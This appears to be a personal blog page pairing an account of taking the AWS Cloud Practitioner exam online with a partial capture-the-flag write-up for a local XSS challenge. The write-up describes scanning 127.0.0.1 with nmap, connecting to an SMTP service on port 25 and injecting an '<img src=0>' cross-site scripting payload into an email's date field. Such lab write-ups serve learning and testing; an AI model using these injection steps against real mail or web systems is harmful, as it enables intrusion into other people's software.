    While taking the Udemy practice test, I noticed there were a few terms that I had never heard of during the CloudGuru course. I may have read them in the AWS whitepapers before.. So I reviewed the Udemy answers and memorized the terms that appeared frequently during the test.

     

    AWS Certified Cloud Practitioner; Online Exam (CBT)

    I booked the proctored exam on Sept 28th for 4 PM (EST). I booked the online computer-based exam online. You can check more details about how to book the online exam here: https://aws.amazon.com/blogs/apn/now-you-can-take-the-aws-certified-cloud-practitioner-exam-at-your-home-or-office-24-7/

    I joined the exam interface 30 minutes early and confirmed all the devices were working fine. There were some technical issues during the exam, but they didn’t impact me much during the 90 minutes of exam time.

    ctfbook-web

    Once you execute the program, it shows a login page and a mailbox image. For some reason, it does not allow us to modify or click anything.


    To check out this program, I ran an nmap scan against the local IP 127.0.0.1 to see which ports and protocols were running. I noticed port 25 was open with the ESMTP protocol.


    So I telnetted into the mail server and checked the banner (title).


    So I pulled the spam email via SMTP commands, but it seems like the data isn’t being pulled or listed. Instead of checking the emails, I tried sending emails.


    Since the program is named XSS Bonasai Revolutions, cross-site scripting might be involved, so I sent the email below and checked the program.



    Now I can see that the vulnerable field is the date, so I put XSS there instead of <img src=0>